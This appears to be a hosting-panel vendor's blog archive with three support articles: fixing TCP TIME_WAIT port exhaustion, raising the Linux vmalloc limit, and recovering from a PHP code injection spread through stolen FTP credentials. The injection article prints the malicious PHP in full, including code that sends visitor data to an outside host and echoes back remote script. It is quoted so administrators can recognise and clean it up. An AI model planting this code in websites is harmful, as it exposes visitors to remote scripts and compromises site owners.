Blog

Archive for March, 2014

KB: 24032014-001: Dealing with TIME WAIT exhaustion (no more TCP connections)

Article keyword index

Sympton

1) You have received a time_wait_checker notification 2) or after a review, you find that all services are up and working but they cannot accept more connections (even though they should) or some services cannot connect to internal services like database servers (like MySQL). At the same time, if you run the following command you get more than 30000 entries:

>> netstat -n | grep TIME_WAIT | wc -l

Another sympton is that specific services like squid fails with the following error:

commBind: Cannot bind socket FD 98 to *:0: (98) Address already in use

Affected releases

All releases may suffer this problem. It’s not a bug but a resource exhaustion problem.

Background

The problem is triggered because some service is creating connections faster than they are collected for reuse. After TCP connection is closed, a period is started to receive lost packages for that closed connection, to avoid mixing them for newly created connections with the same location.

Every time a TCP connection is created, a local port is needed for the local end point. This local end point port is taken from the ephemeral ports range as defined at:

/proc/sys/net/ipv4/ip_local_port_range

If that range is exhausted, no more TCP connections can be created because there is no more ephemeral (local port) available.

There are several ways to solve this problem. The following solutions are listed in the order as they are recommended:

  1. Identify the application that is creating those connections to review if there is a problem.
  2. If it is not possible, increase ephemeral port range. See next section.
  3. If increasing ephemeral port range does not solve the problem, try reduce the amount of time a connection can be in TIME WAIT. See next section.
  4. If that does not solve the problem, try activating TCP time wait reuse option which will cause the system to reuse ports that are in TIME WAIT. See next section.

Solution

In the case you cannot fix the application producing these amount of TIME_WAIT connections, use the following options provided by the time_wait_checker to configure the system to better react to this situation.

  1. First, select the machine and then click on Actions (at the top-right of the machines’ view):actions
  2. Now, click on “Show machine’s checkers”:
  3. Then select the “time_wait_checker” and after that, click on:
    configure.
  4. After that, the following window will be showed to configure various TIME_WAIT handling options:Core-Admin Time-wait's checker options

Now use options available as described and using them in the recommended order.

Some notes about Tcp time wait reuse and recycle options

Special mention to Tcp time wait recycle  ( /proc/sys/net/ipv4/tcp_tw_recycle ) option is that it is considered more aggressive than Tcp time wait reuse  ( /proc/sys/net/ipv4/tcp_tw_reuse ). Both can cause problems because they apply “simplifications” to reduce the wait time and to reuse certain structures. In the case of Tcp time wait recycle, given its nature, it can cause problems with devices behind a NAT by allowing connections in a random manner (just one device will be able to connect to the server with this option enabled). As indicated by the tool, “Observe after activation”. More information about Tcp time wait recycle and how it relates to NATed devices at http://troy.yort.com/improve-linux-tcp-tw-recycle-man-page-entry/

In general, both options shouldn’t be used if not needed.

Long term solutions

The following solutions are not quick and requires preparation. But you can consider them to avoid the problem in the long term.

SOLUTION 1: If possible, update your application to reuse connections created. For example, if those connections are because internal database connections, instaed of creating, querying and closing, try to reuse the connection as much as possible. That will reduce a lot the number of pending TIME_WAIT connection in many cases.

SOLUTION 2: Another possible solution is to use several IPs for the same service and load-balance it through DNS (for example). That way you expand possible TCP location combination that are available and thus, you expand the amount of ephemeral ports available. Every IP available and serving the service double your range.

In any case, SOLUTION 1 by far best than SOLUTION 2. It is better to have a service consuming fewer resources.

Posted in: KB, Linux Networking

Leave a Comment (0) →

KB: 19032014-001: Fixing kernel memory allocation problem

Sympton

If after enabling the firewall you get the following error:

iptables: Memory allocation problem

Or at the server logs you find the following indications:

vmap allocation for size 9146368 failed: use vmalloc= to increase size.

This means the kernel internal memory has reached valloc limit.

Affected releases

All Core-Admin releases that uses a Linux kernel superior or equal to 2.6.32.

Background

The first step is to check current limit. To that end, run the following:

>> cat /proc/meminfo | grep -i vmalloc
VmallocTotal: 124144 kB
VmallocUsed: 5536 kB
VmallocChunk: 1156 kB

In this example, VmallocTotal is telling us we have around 128M of allowed valloc memory.

With this value, we have to increase it to something bigger like 256M or a 384M (which may be too much).

Solution

To update this value we have to pass a parameter to the kernel at boot time.

The exact parameter is vmalloc=256M (configuring the right amount of memory you want). According to the boot loader you are using you’ll have to do the following:

1) LILO: Edit  /etc/lilo.conf to update the append declaration like follows:

image = /boot/vmlinuz
root = /dev/hda1
append = "vmalloc=256M"

2) GRUB 1.0: edit “kopt” variable at /boot/grub/menu.lst to include the declaration. A working example is:

kopt=root=UUID=b530efc1-0b0c-419e-affb-87eb9e18b0dc ro vmalloc=256M

After that, save the file and reload grub configurationl. This is usually done with:

>> update-grub

3) GRUB 2.0 edit /etc/default/grub to update GRUB_CMDLINE_LINUX_DEFAULT variable to include the following declaration:

GRUB_CMDLINE_LINUX_DEFAULT="quiet vmalloc=384M"

After that, you must reload configuration. This is usually done with:

>> update-grub

Posted in: KB

Leave a Comment (0) →

Using Core-Admin to resolve php+# web hacking

After a revision you find out that several web pages have been updated with code like follow or maybe a customer whose web is being blocked by the web browser is calling you because it is including suspicous code like:

<?php
#41f893#
error_reporting(0); ini_set('display_errors',0); $wp_wefl08872 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_wefl08872) &amp;&amp; !preg_match ('/bot/i', $wp_wefl08872))){
$wp_wefl0908872="http://"."http"."href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&amp;referer=".urlencode($_SERVER['HTTP_HOST'])."&amp;ua=".urlencode($wp_wefl08872);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_wefl0908872);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_08872wefl = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_08872wefl,1,3) === 'scr' ){ echo $wp_08872wefl; }
#/41f893#
?>

These attacks do not pose any harm to the server if it is properly configured, but makes affected webpages to execute remote chatting code o ads that will make google chrome and many other browsers to block those pages because running that suspicious code.

Understanding these attacks

The problem about these attacks is that they update original files by including a “chirurgical” modifications making it difficult and annoying to get back to original state.

One option is to have a backup, but with the newer webs which use different shorts of caches and php-to-string files, makes it hard to recover. It is not possible to just recover those files by just replacing. You must get back to a consistent state (for example the last backup). This implies removing current web files and recover from backup files (so backup files don’t get mixed with current files that weren’t including at the backup).

After this, you must remember resetting/blocking all FTP accounts/password that were used during the attack.

First line of defense: know when happens the attack

Core-Admin provides you these knoledge as the attack happens. After the modification, Core-Admin’s file system watching service will report “possible php hash attack found” with an indication like follows:

Core-Admin: detecting php hash attack

After receiving this notification, you only have to run the following comand to find out the amount of files that were modified and the amount of FTP accounts that were compromised. The same command will help you through out the process of recovering infected files and updating ftp accounts’ password.

>> crad-find-and-fix-phphash-attack.pyc

After running above command, which only reports, you can now execute the same command with the following options to fix found files and to update FTP accounts:

>> crad-find-and-fix-phphash-attack.pyc --clean --change-ftp-accounts

How did this attack happen?

This attack is connected with a network of servers that are in charge of applying these modifications along with a virus/malware software that infects machines that use known FTP clients. Here is how the attack develops:

  1. By using known FTP clients that save passwords at known places at the file system, the first part of the attack is established..
  2. It is suspected that using public Wifis and insecure networks while creating FTP session may be part of the problem too.
  3. After this, your machines get exposed to the virus/malware software that extracts stored FTP accounts by sending it to the servers that will perform the FTP attack.
  4. With this information, modification servers (that’s how we call them) that finally attack by using those FTP accounts, downloading original files, updating them and then uploading them back to its original place.

Important notes about the attack

It is important to understand that modification servers do not carry out the attack just after receiving compromised FTP passwords. They will wait to have several passwords to the same system and also they will delay the attack to disconnect both incidents (the web hack and the infection at your computers).

This way, they hope unaware users to not connect both incidents which otherwise will trigger a anti-virus scan by the user to stop information leaking.

In the other hand, they also wait to have several accounts to carry out a massive attack looking for confusion and/or magnitude to increase likehood that part of the infection will survive.

How can I prevent it?

There are several actions you can take to avoid these attacks:

  1. Try to not save FTP accounts in your FTP client. Try to save them into an application that stores those passwords protected by a password..
  2. Avoid using public Wifis and untrusted shared connections (like hotels) to connect to your FTP servers.
  3. If it is possible, after doing FTP modifications, enable read-only mode or disable the FTP account using Core-Admin panel. This way, even though the password is compromised, no modification will be possible..

Posted in: Core-Admin, Core-Admin Web Edition, PHP, Security

Leave a Comment (0) →